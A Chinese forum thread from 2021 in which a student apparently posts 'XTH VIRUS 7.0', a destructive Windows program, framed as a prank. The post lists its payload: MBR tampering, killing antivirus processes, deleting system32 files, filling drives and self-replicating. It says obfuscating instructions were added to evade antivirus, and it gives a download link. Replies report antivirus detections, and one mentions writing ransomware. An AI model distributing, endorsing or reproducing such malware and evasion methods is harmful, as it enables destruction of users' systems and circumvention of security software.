【基于EPL编写的XTH VIRUS7.0版本】

显示全部楼层 · 发表于 2021-5-9 14:34:50

本帖最后由 Kundows 于 2021-5-9 14:45 编辑

基于EPL编写的病毒程序 XTH VIRUS 7.0
=======================================================================================
注：这是恶搞程序，建议安全环境下运行
本次更新更新了
添加了改MBR（无效的）导致无法开机
添加了错误图标随鼠标指针乱动
添加了LBW背景音乐添加了花指令（让杀毒软件更难查出来）
取消了打钱功能1，行为
改注册表
改文件关联
改mbr
运行后结束杀毒软件进程
生产一堆名字意味深长的用户
在C:\ D:\ E:\ F:\生成一个巨大的文件
删除system32的OCX DLL MSC等文件
重复并自我复制导致CPU爆炸
错误图标随鼠标乱动
播放LBW动感音乐
将时间改为6666年6月6日
2，下载
【https://wws.lanzous.com/i8y5poyh6kb】
3，启动
点击 XTH VIRUS 7.0.zip
4，后记
为了写这个毒我花了我大半年时间（我是新手也是学生）
有很多次我编译不出来差点砸电脑
（说实话30%都是问百度的）
所以，希望各位不喜勿喷

4.5，微步云沙箱
https://s.threatbook.cn/report/file/f4e41d447d8956200b718eebdf9f594c88f386439eab416f758a3209508d106b/?env=win7_sp1_enx86_office2013
5,7.0版本特殊后记
前些天在某音平台看视频突然看见一个熟悉的PS改的SB图标
看着很熟悉
结果一看
这™就是我的病毒
并且没有转发出处
可以说约等于我写的病毒给他赚点击数
就是这样
所以我加了一下出处
希望如果转载
回我一下！！！！！！！！！！！！！！！！！！！！！！！！！！！

显示全部楼层 · 发表于 2021-5-9 14:40:56

毒霸扫描miss

显示全部楼层 · 发表于 2021-5-9 14:41:42

火绒、智量kill

显示全部楼层 · 发表于 2021-5-9 14:49:25

毛豆入沙

显示全部楼层 · 发表于 2021-5-9 15:02:14

mcafee

显示全部楼层 · 发表于 2021-5-9 15:20:59

IKARUS

Date and Time: 5/9/2021 3:20:54 PM
File Size: 1584 kB
Detection Name: Trojan-Dropper.Win32.Flystud
Detection-ID: 450578
Suggestion: Backup
File Name: f_000053
Original Path: C:\Users\promi\AppData\Roaming\360se6\User Data\Default\Cache

复制代码

显示全部楼层 · 发表于 2021-5-9 15:49:00

本帖最后由正在缓冲于 2021-5-9 15:51 编辑

Avast Microsoft Defender
Win32:Malware-gen Backdoor:Win32/FlyAgent.F

显示全部楼层 · 发表于 2021-5-9 16:06:07

卡巴斯基扫描miss

显示全部楼层 · 发表于 2021-5-9 16:44:13

BD 扫描miss

显示全部楼层 · 发表于 2021-5-9 17:00:49

巧了

我写勒索的时候加密方法都是问百度的

[病毒样本] 【基于EPL编写的XTH VIRUS7.0版本】

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源